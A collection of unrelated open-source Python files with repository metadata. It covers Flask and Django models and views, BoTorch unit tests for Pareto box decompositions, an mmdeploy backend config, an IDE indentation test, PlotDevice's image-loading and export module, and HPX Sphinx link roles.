5654e5feba854d3b41b8dd75218e0221408e7831
|
refs/heads/master
| 2023-09-04T21:28:57.386174
| 2023-08-11T07:07:45
| 2023-08-11T07:07:45
| 186,743,986
| 698
| 2,347
|
Unlicense
| 2022-10-06T04:06:56
| 2019-05-15T03:40:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 627
|
py
|
app.py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class Owner(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20))
address = db.Column(db.String(100))
pets = db.relationship('Pet', backref='owner')
class Pet(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20))
age = db.Column(db.Integer)
owner_id = db.Column(db.Integer, db.ForeignKey('owner.id'))
|
ac856cb469868e6bfd92c040245a4b1218c1e388
|
db57665fbc6c840b3e0b68d7a2ae6997d2bbb7f3
|
/ch11-books/books/views.py
|
5a9e8f2eda506bca213e8184b111e5f911fd0657
|
[
"MIT"
] |
permissive
|
wsvincent/djangoforprofessionals
|
4a9de4a8db8017bd704df2129d5a608ed8270380
|
bb17b5115089140c2ae8a3ef5b27de083851558d
|
refs/heads/main
| 2023-08-23T16:21:43.555596
| 2022-06-02T13:52:11
| 2022-06-02T13:52:11
| 178,557,837
| 597
| 318
|
MIT
| 2023-08-05T00:51:17
| 2019-03-30T12:49:00
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 354
|
py
|
views.py
|
from django.views.generic import ListView, DetailView # new
from .models import Book
class BookListView(ListView):
model = Book
context_object_name = "book_list"
template_name = "books/book_list.html"
class BookDetailView(DetailView):
model = Book
context_object_name = "book" # new
template_name = "books/book_detail.html"
|
0a2c1c64d6437a6fa314da43e6dd4c50f8e7464c
|
c058f51b99f91faebf27183b2b579e9f96e0d8f5
|
/test/utils/multi_objective/box_decompositions/test_utils.py
|
bf6b8edfe2deda4a9f730eb05e4e2891df51f586
|
[
"MIT"
] |
permissive
|
pytorch/botorch
|
255d62f698cc615c750e9343c278a63c7e96a586
|
4cc5ed59b2e8a9c780f786830c548e05cc74d53c
|
refs/heads/main
| 2023-08-22T15:23:51.071048
| 2023-08-22T05:30:38
| 2023-08-22T05:30:38
| 142,940,093
| 2,891
| 373
|
MIT
| 2023-09-13T00:16:13
| 2018-07-30T23:59:57
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 14,167
|
py
|
test_utils.py
|
#! /usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import torch
from botorch.exceptions.errors import BotorchTensorDimensionError, UnsupportedError
from botorch.utils.multi_objective.box_decompositions.utils import (
_expand_ref_point,
_pad_batch_pareto_frontier,
compute_dominated_hypercell_bounds_2d,
compute_local_upper_bounds,
compute_non_dominated_hypercell_bounds_2d,
get_partition_bounds,
update_local_upper_bounds_incremental,
)
from botorch.utils.testing import BotorchTestCase
class TestUtils(BotorchTestCase):
def test_expand_ref_point(self):
ref_point = torch.tensor([1.0, 2.0], device=self.device)
for dtype in (torch.float, torch.double):
ref_point = ref_point.to(dtype=dtype)
# test non-batch
self.assertTrue(
torch.equal(
_expand_ref_point(ref_point, batch_shape=torch.Size([])),
ref_point,
)
)
self.assertTrue(
torch.equal(
_expand_ref_point(ref_point, batch_shape=torch.Size([3])),
ref_point.unsqueeze(0).expand(3, -1),
)
)
# test ref point with wrong shape batch_shape
with self.assertRaises(BotorchTensorDimensionError):
_expand_ref_point(ref_point.unsqueeze(0), batch_shape=torch.Size([]))
with self.assertRaises(BotorchTensorDimensionError):
_expand_ref_point(ref_point.unsqueeze(0).expand(3, -1), torch.Size([2]))
def test_pad_batch_pareto_frontier(self):
for dtype in (torch.float, torch.double):
Y1 = torch.tensor(
[
[1.0, 5.0],
[10.0, 3.0],
[4.0, 5.0],
[4.0, 5.0],
[5.0, 5.0],
[8.5, 3.5],
[8.5, 3.5],
[8.5, 3.0],
[9.0, 1.0],
[8.0, 1.0],
],
dtype=dtype,
device=self.device,
)
Y2 = torch.tensor(
[
[1.0, 9.0],
[10.0, 3.0],
[4.0, 5.0],
[4.0, 5.0],
[5.0, 5.0],
[8.5, 3.5],
[8.5, 3.5],
[8.5, 3.0],
[9.0, 5.0],
[9.0, 4.0],
],
dtype=dtype,
device=self.device,
)
Y = torch.stack([Y1, Y2], dim=0)
ref_point = torch.full((2, 2), 2.0, dtype=dtype, device=self.device)
padded_pareto = _pad_batch_pareto_frontier(
Y=Y, ref_point=ref_point, is_pareto=False
)
expected_nondom_Y1 = torch.tensor(
[[10.0, 3.0], [5.0, 5.0], [8.5, 3.5]],
dtype=dtype,
device=self.device,
)
expected_padded_nondom_Y2 = torch.tensor(
[
[10.0, 3.0],
[9.0, 5.0],
[9.0, 5.0],
],
dtype=dtype,
device=self.device,
)
expected_padded_pareto = torch.stack(
[expected_nondom_Y1, expected_padded_nondom_Y2], dim=0
)
self.assertTrue(torch.equal(padded_pareto, expected_padded_pareto))
# test feasibility mask
feas = (Y >= 9.0).any(dim=-1)
expected_nondom_Y1 = torch.tensor(
[[10.0, 3.0], [10.0, 3.0]],
dtype=dtype,
device=self.device,
)
expected_padded_nondom_Y2 = torch.tensor(
[[10.0, 3.0], [9.0, 5.0]],
dtype=dtype,
device=self.device,
)
expected_padded_pareto = torch.stack(
[expected_nondom_Y1, expected_padded_nondom_Y2], dim=0
)
padded_pareto = _pad_batch_pareto_frontier(
Y=Y, ref_point=ref_point, feasibility_mask=feas, is_pareto=False
)
self.assertTrue(torch.equal(padded_pareto, expected_padded_pareto))
# test is_pareto=True
# one row of Y2 should be dropped because it is not better than the
# reference point
Y1 = torch.tensor(
[[10.0, 3.0], [5.0, 5.0], [8.5, 3.5]],
dtype=dtype,
device=self.device,
)
Y2 = torch.tensor(
[
[1.0, 9.0],
[10.0, 3.0],
[9.0, 5.0],
],
dtype=dtype,
device=self.device,
)
Y = torch.stack([Y1, Y2], dim=0)
expected_padded_pareto = torch.stack(
[
Y1,
torch.cat([Y2[1:], Y2[-1:]], dim=0),
],
dim=0,
)
padded_pareto = _pad_batch_pareto_frontier(
Y=Y, ref_point=ref_point, is_pareto=True
)
self.assertTrue(torch.equal(padded_pareto, expected_padded_pareto))
# test multiple batch dims
with self.assertRaises(UnsupportedError):
_pad_batch_pareto_frontier(
Y=Y.unsqueeze(0), ref_point=ref_point, is_pareto=False
)
def test_compute_hypercell_bounds_2d(self):
ref_point_raw = torch.zeros(2, device=self.device)
arange = torch.arange(3, 9, device=self.device)
pareto_Y_raw = torch.stack([arange, 11 - arange], dim=-1)
inf = float("inf")
for method in (
compute_non_dominated_hypercell_bounds_2d,
compute_dominated_hypercell_bounds_2d,
):
if method == compute_non_dominated_hypercell_bounds_2d:
expected_cell_bounds_raw = torch.tensor(
[
[
[0.0, 8.0],
[3.0, 7.0],
[4.0, 6.0],
[5.0, 5.0],
[6.0, 4.0],
[7.0, 3.0],
[8.0, 0.0],
],
[
[3.0, inf],
[4.0, inf],
[5.0, inf],
[6.0, inf],
[7.0, inf],
[8.0, inf],
[inf, inf],
],
],
device=self.device,
)
else:
expected_cell_bounds_raw = torch.tensor(
[
[
[0.0, 0.0],
[3.0, 0.0],
[4.0, 0.0],
[5.0, 0.0],
[6.0, 0.0],
[7.0, 0.0],
],
[
[3.0, 8.0],
[4.0, 7.0],
[5.0, 6.0],
[6.0, 5.0],
[7.0, 4.0],
[8.0, 3.0],
],
],
device=self.device,
)
for dtype in (torch.float, torch.double):
pareto_Y = pareto_Y_raw.to(dtype=dtype)
ref_point = ref_point_raw.to(dtype=dtype)
expected_cell_bounds = expected_cell_bounds_raw.to(dtype=dtype)
# test non-batch
cell_bounds = method(
pareto_Y_sorted=pareto_Y,
ref_point=ref_point,
)
self.assertTrue(torch.equal(cell_bounds, expected_cell_bounds))
# test batch
pareto_Y_batch = torch.stack(
[pareto_Y, pareto_Y + pareto_Y.max(dim=-2).values], dim=0
)
# filter out points that are not better than ref_point
ref_point = pareto_Y.max(dim=-2).values
pareto_Y_batch = _pad_batch_pareto_frontier(
Y=pareto_Y_batch, ref_point=ref_point, is_pareto=True
)
# sort pareto_Y_batch
pareto_Y_batch = pareto_Y_batch.gather(
index=torch.argsort(pareto_Y_batch[..., :1], dim=-2).expand(
pareto_Y_batch.shape
),
dim=-2,
)
cell_bounds = method(
ref_point=ref_point,
pareto_Y_sorted=pareto_Y_batch,
)
# check hypervolume
max_vals = (pareto_Y + pareto_Y).max(dim=-2).values
if method == compute_non_dominated_hypercell_bounds_2d:
clamped_cell_bounds = torch.min(cell_bounds, max_vals)
total_hv = (max_vals - ref_point).prod()
nondom_hv = (
(clamped_cell_bounds[1] - clamped_cell_bounds[0])
.prod(dim=-1)
.sum(dim=-1)
)
hv = total_hv - nondom_hv
else:
hv = (cell_bounds[1] - cell_bounds[0]).prod(dim=-1).sum(dim=-1)
self.assertEqual(hv[0].item(), 0.0)
self.assertEqual(hv[1].item(), 49.0)
class TestFastPartitioningUtils(BotorchTestCase):
"""
Test on the problem (with the simplying assumption on general position)
from Table 1 in:
https://www.sciencedirect.com/science/article/pii/S0305054816301538
"""
def setUp(self):
super().setUp()
self.ref_point = -torch.tensor([10.0, 10.0, 10.0], device=self.device)
self.U = -self.ref_point.clone().view(1, -1)
self.Z = torch.empty(1, 3, 3, device=self.device)
ideal_value = 0.0
for j in range(self.U.shape[-1]):
self.Z[0, j] = torch.full(
(1, self.U.shape[-1]),
ideal_value,
dtype=self.Z.dtype,
device=self.device,
)
self.Z[0, j, j] = self.U[0][j]
self.pareto_Y = -torch.tensor(
[
[3.0, 5.0, 7.0],
[6.0, 2.0, 4.0],
[4.0, 7.0, 3.0],
],
device=self.device,
)
self.expected_U_after_update = torch.tensor(
[
[3.0, 10.0, 10.0],
[6.0, 5.0, 10.0],
[10.0, 2.0, 10.0],
[4.0, 10.0, 7.0],
[6.0, 7.0, 7.0],
[10.0, 7.0, 4.0],
[10.0, 10.0, 3.0],
],
device=self.device,
)
self.expected_Z_after_update = torch.tensor(
[
[[3.0, 5.0, 7.0], [0.0, 10.0, 0.0], [0.0, 0.0, 10.0]],
[[6.0, 2.0, 4.0], [3.0, 5.0, 7.0], [0.0, 0.0, 10.0]],
[[10.0, 0.0, 0.0], [6.0, 2.0, 4.0], [0.0, 0.0, 10.0]],
[[4.0, 7.0, 3.0], [0.0, 10.0, 0.0], [3.0, 5.0, 7.0]],
[[6.0, 2.0, 4.0], [4.0, 7.0, 3.0], [3.0, 5.0, 7.0]],
[[10.0, 0.0, 0.0], [4.0, 7.0, 3.0], [6.0, 2.0, 4.0]],
[[10.0, 0.0, 0.0], [0.0, 10.0, 0.0], [4.0, 7.0, 3.0]],
],
device=self.device,
)
def test_local_upper_bounds_utils(self):
for dtype in (torch.float, torch.double):
U = self.U.to(dtype=dtype)
Z = self.Z.to(dtype=dtype)
pareto_Y = self.pareto_Y.to(dtype=dtype)
expected_U = self.expected_U_after_update.to(dtype=dtype)
expected_Z = self.expected_Z_after_update.to(dtype=dtype)
# test z dominates U
U_new, Z_new = compute_local_upper_bounds(U=U, Z=Z, z=-self.ref_point + 1)
self.assertTrue(torch.equal(U_new, U))
self.assertTrue(torch.equal(Z_new, Z))
# test compute_local_upper_bounds
for i in range(pareto_Y.shape[0]):
U, Z = compute_local_upper_bounds(U=U, Z=Z, z=-pareto_Y[i])
self.assertTrue(torch.equal(U, expected_U))
self.assertTrue(torch.equal(Z, expected_Z))
# test update_local_upper_bounds_incremental
# test that calling update_local_upper_bounds_incremental once with
# the entire Pareto set yields the same result
U2, Z2 = update_local_upper_bounds_incremental(
new_pareto_Y=-pareto_Y,
U=self.U.to(dtype=dtype),
Z=self.Z.to(dtype=dtype),
)
self.assertTrue(torch.equal(U2, expected_U))
self.assertTrue(torch.equal(Z2, expected_Z))
def test_get_partition_bounds(self):
expected_bounds_raw = torch.tensor(
[
[[3.0, 5.0, 7.0], [6.0, 2.0, 7.0], [4.0, 7.0, 3.0], [6.0, 2.0, 4.0]],
[
[10.0, 10.0, 10.0],
[10.0, 5.0, 10.0],
[10.0, 10.0, 7.0],
[10.0, 7.0, 7.0],
],
],
device=self.device,
)
for dtype in (torch.float, torch.double):
final_U = self.expected_U_after_update.to(dtype=dtype)
final_Z = self.expected_Z_after_update.to(dtype=dtype)
bounds = get_partition_bounds(
Z=final_Z, U=final_U, ref_point=-self.ref_point
)
expected_bounds = expected_bounds_raw.to(dtype=dtype)
self.assertTrue(torch.equal(bounds, expected_bounds))
|
03f9614f114eb712db6f808cc155f189a6a6507f
|
0e083f405af00029c9ec31849f0f7f81c56844b5
|
/configs/mmseg/segmentation_vacc-fp16_static_512x512.py
|
04de98468eca47da918a0fb72859d58798e372f3
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmdeploy
|
39b9e7b611caab2c76a6142fcb99f0bf1d92ad24
|
5479c8774f5b88d7ed9d399d4e305cb42cc2e73a
|
refs/heads/main
| 2023-09-01T21:29:25.315371
| 2023-08-31T09:59:29
| 2023-08-31T09:59:29
| 441,467,833
| 2,164
| 605
|
Apache-2.0
| 2023-09-14T10:39:04
| 2021-12-24T13:04:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,187
|
py
|
segmentation_vacc-fp16_static_512x512.py
|
_base_ = ['./segmentation_static.py', '../_base_/backends/vacc.py']
onnx_config = dict(input_shape=[512, 512])
backend_config = dict(
common_config=dict(
vdsp_params_info=dict(
vdsp_op_type=301,
iimage_format=5000,
iimage_width=512,
iimage_height=512,
oimage_width=512,
oimage_height=512,
iimage_width_pitch=512,
iimage_height_pitch=512,
resize_type=1,
color_cvt_code=2,
color_space=0,
meanr=22459,
meang=22340,
meanb=22136,
stdr=21325,
stdg=21284,
stdb=21292,
norma_type=3)),
model_inputs=[dict(shape=dict(input=[1, 3, 512, 512]))])
codebase_config = dict(model_type='vacc_seg')
partition_config = dict(
type='vacc_seg',
apply_marks=True,
partition_cfg=[
dict(
save_file='model.onnx',
start=['segmentor_forward:output'],
# 'decode_head' will skip `ArgMax`
# 'seg_maps' will skip `Resize` and `ArgMax`
end=['decode_head:input'],
output_names=['feat'])
])
|
490f544f12dae432c34568098ed41233b2ffb337
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/console/indent6.py
|
6213c78f7a9849b390e12f1531834890edaf79ae
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
indent6.py
|
class Foo:
def x(self):
b = "x".format("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
if b:
pass
|
92937eb9d7fbcfd2dee291f604ff49459138f709
|
0f443b5060644606abb090935bb8fe234378a659
|
/plotdevice/gfx/image.py
|
9e3915c52564474355a392c9aeca5ce9fe3c6bed
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
plotdevice/plotdevice
|
6920ae4f11b65c3bd5a7c1d9d21cd0cd3444fd42
|
63992250982590a5290c0135fb9845581c5ccd89
|
refs/heads/main
| 2023-08-28T11:55:18.331183
| 2022-07-15T19:52:20
| 2022-07-15T19:52:20
| 14,907,048
| 116
| 17
| null | 2022-07-10T21:16:19
| 2013-12-03T21:58:16
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 15,615
|
py
|
image.py
|
# encoding: utf-8
import os
import re
import json
import warnings
import math
from contextlib import contextmanager
from urllib.parse import urlparse
from ..lib.cocoa import *
from plotdevice import DeviceError
from ..util import _copy_attrs, autorelease
from ..util.readers import HTTP, last_modified
from ..lib.io import MovieExportSession, ImageExportSession
from .geometry import Region, Size, Point, Transform, CENTER
from .atoms import TransformMixin, EffectsMixin, FrameMixin, Grob
from .colors import CMYK
from . import _ns_context
_ctx = None
__all__ = ("Image", 'ImageWriter')
### The bitmap/vector image-container (a.k.a. NSImage proxy) ###
class Image(EffectsMixin, TransformMixin, FrameMixin, Grob):
stateAttrs = ('_nsImage',)
opts = ('data',)
def __init__(self, *args, **kwargs):
"""
Positional parameters:
- src: the path to an image file, an existing Image object, or the `canvas` global
- x & y: position of top-left corner
- width & height: limit either or both dimensions to a maximum size
If a width and height are both given, the narrower dimension is used
If both are omitted default to full-size
Optional keyword parameters:
- data: a stream of bytes of image data. If the data begins with the
characters "base64," the remainder of the stream will be
decoded before loading
- alpha: the image opacity (0-1.0)
- blend: a blend mode name
Example usage:
x,y, w,h = 10,10, 200,200
Image("foo.png", x, y, w, h)
Image(<Image object>, x, y, height=h)
Image(x, y, src='path-or-url')
Image(x, y, data='<raw bytes from an image file>')
Image(x, y, data='base64,<b64-encoded bytes>')
Image(canvas, x, y)
"""
# let the mixins handle transforms & effects
super(Image, self).__init__(**kwargs)
# look for a path or Image as the first arg, or a `data` kwarg (plus `image` for compat)
args = list(args)
data = kwargs.get('data', None)
src = kwargs.get('src', kwargs.get('image', None))
if args and not (src or data):
src = args.pop(0) # use first arg if image wasn't in kwargs
elif args and args[0] is None:
args.pop(0) # make image(None, 10,20, image=...) work properly for compat
# get an NSImage reference (once way or another)
if data:
self._nsImage = self._lazyload(data=data)
elif src:
if isinstance(src, NSImage):
self._nsImage = src.copy()
self._nsImage.setFlipped_(True)
elif hasattr(src, '_nsImage'):
self._nsImage = src._nsImage
elif isinstance(src, str):
self._nsImage = self._lazyload(path=src)
else:
invalid = "Not a valid image source: %r" % type(src)
raise DeviceError(invalid)
# set the bounds (in phases)
if isinstance(src, Image):
# if working from an existing Image, inherit its bounds as the default
for attr in ['x','y','width','height']:
setattr(self, attr, getattr(src, attr))
if args:
# override defaults with positional bounds args (if any)
self._frame._parse(args)
if kwargs:
# finally, let keyword args override the inherited & positional bounds
for k,v in kwargs.items():
if k in FrameMixin.opts:
setattr(self, k, v)
def _lazyload(self, path=None, data=None):
# loads either a `path` or `data` kwarg and returns an NSImage
# `path` should be the path of a valid image file
# `data` should be the bytestring contents of an image file, or base64-encoded
# with the characters "base64," prepended to it
NSDataBase64DecodingIgnoreUnknownCharacters = 1
_cache = _ctx._imagecache
if data is not None:
# convert the str into an NSData (possibly decoding along the way)
if isinstance(data, str) and data.startswith('base64,'):
data = NSData.alloc().initWithBase64EncodedString_options_(data[7:], NSDataBase64DecodingIgnoreUnknownCharacters)
elif not isinstance(data, NSData):
data = NSData.dataWithBytes_length_(data, len(data))
key, mtime, err_info = data.hash(), None, type(data)
# return a cached image if possible...
if key in _cache:
return _cache[key][0]
# ...or load from the data
if b'<svg' in data.getBytes_length_(None, 128):
image = NSImage.svgFromData_(data)
else:
image = NSImage.alloc().initWithData_(data)
elif path is not None:
if re.match(r'https?:', path):
# load from url
key = err_info = path
resp = HTTP.get(path)
mtime = last_modified(resp)
# return a cached image if possible...
if path in _cache and _cache[path][1] >= mtime:
return _cache[path][0]
# ...or load from the data
data = NSData.dataWithBytes_length_(resp.content, len(resp.content))
if 'svg' in resp.headers['Content-Type'] or urlparse(path).path.lower().endswith('.svg'):
image = NSImage.svgFromData_(data)
else:
image = NSImage.alloc().initWithData_(data)
else:
# load from file path
try:
path = NSString.stringByExpandingTildeInPath(path)
mtime = os.path.getmtime(path)
# return a cached image if possible...
if path in _cache and _cache[path][1] >= mtime:
return _cache[path][0]
except:
notfound = 'Image "%s" not found.' % path
raise DeviceError(notfound)
key = err_info = path
# ...or load from the file
if path.lower().endswith('.svg'):
image = NSImage.svgFromURL_(NSURL.fileURLWithPath_(path))
else:
image = NSImage.alloc().initWithContentsOfFile_(path)
# if we wound up with a valid image, configure and cache the NSImage
# before returning it
if image is None:
invalid = "Doesn't seem to contain image data: %r" % err_info
raise DeviceError(invalid)
image.setFlipped_(True)
image.setCacheMode_(NSImageCacheNever)
_cache[key] = (image, mtime)
return _cache[key][0]
@property
def image(self):
warnings.warn("The 'image' attribute is deprecated. Please use _nsImage instead.", DeprecationWarning, stacklevel=2)
return self._nsImage
@property
def _nsBitmap(self):
for bitmap in self._nsImage.representations():
# if we already have a bitmap representation, use that...
if isinstance(bitmap, NSBitmapImageRep):
break
else:
# ...otherwise convert the vector image to a bitmap
# (note that this should use _screen_transform somehow but currently doesn't)
tiffdata = self._nsImage.TIFFRepresentation()
image = NSImage.alloc().initWithData_(tiffdata)
bitmap = image.representations()[0]
return bitmap
@property
def _ciImage(self):
# core-image needs to be told to compensate for our flipped coords
flip = NSAffineTransform.transform()
flip.translateXBy_yBy_(0, self.size.height)
flip.scaleXBy_yBy_(1,-1)
ciImage = CIImage.alloc().initWithBitmapImageRep_(self._nsBitmap)
transform = CIFilter.filterWithName_("CIAffineTransform")
transform.setValue_forKey_(ciImage, "inputImage")
transform.setValue_forKey_(flip, "inputTransform")
return transform.valueForKey_("outputImage")
@property
def bounds(self):
w, h = self.size.w*self._scalefactor, self.size.h*self._scalefactor
return Region(self.x, self.y, w, h)
@property
def size(self):
"""Returns the size of the source image in canvas units. Note that any magnification
via the width and height parameters is not factored in. For the displayed size, see
the .bounds property."""
return self._from_px(self._nsImage.size())
@property
def _scalefactor(self):
"""Fits the image into any specified width & height constraints. If neither was
included in the call to image(), defaults to the image file's full size."""
src = self.size
if not any([self.width, self.height]):
factor = 1.0
elif all([self.width, self.height]):
factor = min(self.width/src.width, self.height/src.height)
else:
dim, src_dim = max((self.width or 0, src.width), (self.height or 0, src.height))
factor = dim/src_dim
return factor
@property
def _screen_transform(self):
"""Returns the Transform object that will be used to draw the image.
The transform incorporates the global context state but also accounts for
centering and max width/height values set in the constructor."""
# accumulate transformations in a fresh matrix
xf = Transform()
# set scale factor so entire image fits in the given rect or dimension
factor = self._scalefactor
# calculate the pixel dimensions (accounting for the canvas's units)
dx, dy = self._to_px(Point(self.x, self.y))
w, h = self._to_px(self.size)
# calculate the translation offset for centering (if any)
nudge = Transform()
if self._transformmode == CENTER:
nudge.translate(w*factor/2, h*factor/2)
xf.translate(dx, dy) # set the position before applying transforms
xf.prepend(nudge) # nudge the image to its center (or not)
xf.prepend(self.transform) # add context's CTM.
xf.prepend(nudge.inverse) # Move back to the real origin.
xf.scale(factor) # scale to fit size constraints (if any)
return xf
def _draw(self):
"""Draw an image on the given coordinates."""
with _ns_context() as ns_ctx:
self._screen_transform.concat() # move the image into place via transforms
with self.effects.applied(): # apply any blend/alpha/shadow effects
ns_ctx.setImageInterpolation_(NSImageInterpolationHigh)
bounds = ((0,0), self._nsImage.size()) # draw the image at (0,0)
self._nsImage.drawAtPoint_fromRect_operation_fraction_((0,0), bounds, NSCompositeSourceOver, self.alpha)
# NB: the nodebox source warns about quartz bugs triggered by drawing
# EPSs to other origin points. no clue whether this still applies...
### context manager for calls to `with export(...)` ###
import time
re_padded = re.compile(r'{(\d+)}')
class ImageWriter(object):
def __init__(self, fname, format, **opts):
self.mode = CMYK if opts['cmyk'] else _ctx._outputmode
self.fname = os.path.expanduser(fname)
self.format = format
self.opts = opts
self.anim = 'fps' in opts
self.session = None
def __enter__(self):
self._pool = NSAutoreleasePool.alloc().init()
_ctx._saveContext()
_ctx._outputmode = self.mode
return self
def __exit__(self, type, value, tb):
if not self.session:
#
# with export('out.png'):
# ... # draw a single frame
#
self.opts['single'] = True
self.add()
_ctx._restoreContext()
self.finish()
del self._pool
def __del__(self):
if not self.session:
#
# ... # draw a single frame
# export('out.png')
#
m = re_padded.search(self.fname)
fn = re_padded.sub('0'*int(m.group(1)), self.fname, count=1) if m else self.fname
_ctx._outputmode = self.mode
_ctx.canvas.save(fn, self.format, self.opts['zoom'], self.mode==CMYK)
@property
def page(self):
"""Clears the canvas, runs the code in the `with` block, then adds the canvas as a new pdf page.
For example, to create a pdf with two pages, you could write:
with export("multipage.pdf") as pdf:
clear(all)
... # draw first page
pdf.add()
clear(all)
... # draw the next page
pdf.add()
With the `page` context manager it simplifies to:
with export("multipage.pdf") as pdf:
with pdf.page:
... # draw first page
with pdf.page:
... # draw the next page
"""
if self.format != 'pdf':
badform = 'The `page` property can only be used in PDF exports (not %r)'%self.format
raise DeviceError(badform)
self.opts['single'] = True
return self.frame
@property
@contextmanager
def frame(self):
"""Clears the canvas, runs the code in the `with` block, then adds the canvas to the
animation or image sequence.
For example, to create a quicktime movie and write a single frame to it you could write:
with export("anim.mov") as movie:
canvas.clear()
... # draw the frame
movie.add()
With the `frame` context manager, this simplifies to:
with export("anim.mov") as movie:
with movie.frame:
... # draw the frame
You can also use the `frame` property when writing to a series of sequentially-named
files. For example, to generate 'output-0001.png' through 'output-0100.png':
with export('output.png') as seq:
for i in range(100):
with seq.frame:
... # draw the next image in the sequence
Or if you'd like to control the numbering, specify a padding-width and location in
the file name by including a '{n}' in the call to export(). The following will
generate files named '01-output.png' through '100-output.png':
with export('{2}-output.png') as seq:
for i in range(100):
with seq.frame:
... # draw the next image in the sequence
"""
with autorelease():
_ctx._saveContext()
yield
self.add()
_ctx._restoreContext()
def add(self):
"""Add a new frame or page with the current contents of the canvas."""
if not self.session:
if self.anim:
self.session = MovieExportSession(self.fname, self.format, **self.opts)
else:
self.session = ImageExportSession(self.fname, self.format, **self.opts)
self.session.add(_ctx.canvas)
def finish(self):
"""Blocks until disk I/O is complete"""
self.session.done()
while True:
if self.session.writer.doneWriting():
break
time.sleep(0.1)
|
eabae0aea330a3be51ba8fceeac84d0d57531ac6
|
9939aab9b0bd1dcf8f37d4ec315ded474076b322
|
/docs/sphinx/extensions/sphinx-hpx.py
|
319766809ea62b18c2c2e89fdd04f4d5aacfb8f4
|
[
"BSL-1.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
STEllAR-GROUP/hpx
|
1068d7c3c4a941c74d9c548d217fb82702053379
|
c435525b4631c5028a9cb085fc0d27012adaab8c
|
refs/heads/master
| 2023-08-30T00:46:26.910504
| 2023-08-29T14:59:39
| 2023-08-29T14:59:39
| 4,455,628
| 2,244
| 500
|
BSL-1.0
| 2023-09-14T13:54:12
| 2012-05-26T15:02:39
|
C++
|
UTF-8
|
Python
| false
| false
| 2,806
|
py
|
sphinx-hpx.py
|
# Copyright (c) 2018 Mikael Simberg
# Copyright (c) 2022 Hartmut Kaiser
#
# SPDX-License-Identifier: BSL-1.0
# Distributed under the Boost Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
from docutils import nodes
def setup(app):
app.add_role('hpx-issue', autolink('https://github.com/STEllAR-GROUP/hpx/issues/%s', "Issue #"))
app.add_role('hpx-header', autolink_hpx_file('http://github.com/STEllAR-GROUP/hpx/blob/%s/%s/%s'))
app.add_role('hpx-pr', autolink('https://github.com/STEllAR-GROUP/hpx/pull/%s', "PR #"))
app.add_role('cppreference-header', autolink('http://en.cppreference.com/w/cpp/header/%s'))
app.add_role('cppreference-algorithm', autolink('http://en.cppreference.com/w/cpp/algorithm/%s'))
app.add_role('cppreference-memory', autolink('http://en.cppreference.com/w/cpp/memory/%s'))
app.add_role('cppreference-container', autolink('http://en.cppreference.com/w/cpp/container/%s'))
app.add_role('cppreference-generic', autolink_generic('http://en.cppreference.com/w/cpp/%s/%s'))
def autolink(pattern, prefix=''):
def role(name, rawtext, text, lineno, inliner, options={}, content=[]):
url = pattern % (text,)
node = nodes.reference(rawtext, prefix + text, refuri=url, **options)
return [node], []
return role
# The text in the rst file should be:
# :hpx-header:`base_path,file_name`
def autolink_hpx_file(pattern):
def role(name, rawtext, text, lineno, inliner, options={}, content=[]):
text_parts = [p.strip() for p in text.split(',')]
commit = inliner.document.settings.env.app.config.html_context['fullcommit']
if len(text_parts) >= 2:
url = pattern % (commit, text_parts[0], text_parts[1])
else:
url = pattern % (commit, text_parts[0], text_parts[0])
node = nodes.reference(rawtext, text_parts[1], refuri=url, **options)
return [node], []
return role
# The text in the rst file should be:
# :cppreference-generic:`base_path,typename[,shown]`, for instance `thread,barrier`
def autolink_generic(pattern):
def role(name, rawtext, text, lineno, inliner, options={}, content=[]):
text_parts = [p.strip() for p in text.split(',')]
shown_text = None
if len(text_parts) >= 3:
shown_text = text_parts[2]
url = pattern % (text_parts[0], text_parts[1])
elif len(text_parts) == 2:
shown_text = text_parts[1]
url = pattern % (text_parts[0], text_parts[1])
else:
shown_text = text_parts[0]
url = pattern % (text_parts[0], text_parts[0])
node = nodes.reference(rawtext, "std::" + shown_text, refuri=url, **options)
return [node], []
return role
|
ce17a042134a40896b6eb89dd78572ede7069674
|
d1f15554df2d5c0f74ddbcba6e870359841f682b
|
/wagtail/management/commands/move_pages.py
|
0502f67f8dd6639c57e84f6821fbe6d1fccd6619
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
wagtail/wagtail
|
bd405f89b86e0c625fef0685fd6bfba41cf5cbfc
|
06a7bc6124bf62675c09fbe0a4ed9bbac183e025
|
refs/heads/main
| 2023-09-04T06:22:51.601208
| 2023-09-01T15:22:00
| 2023-09-01T15:22:00
| 16,479,108
| 12,974
| 3,580
|
BSD-3-Clause
| 2023-09-14T10:45:04
| 2014-02-03T12:41:59
|
Python
|
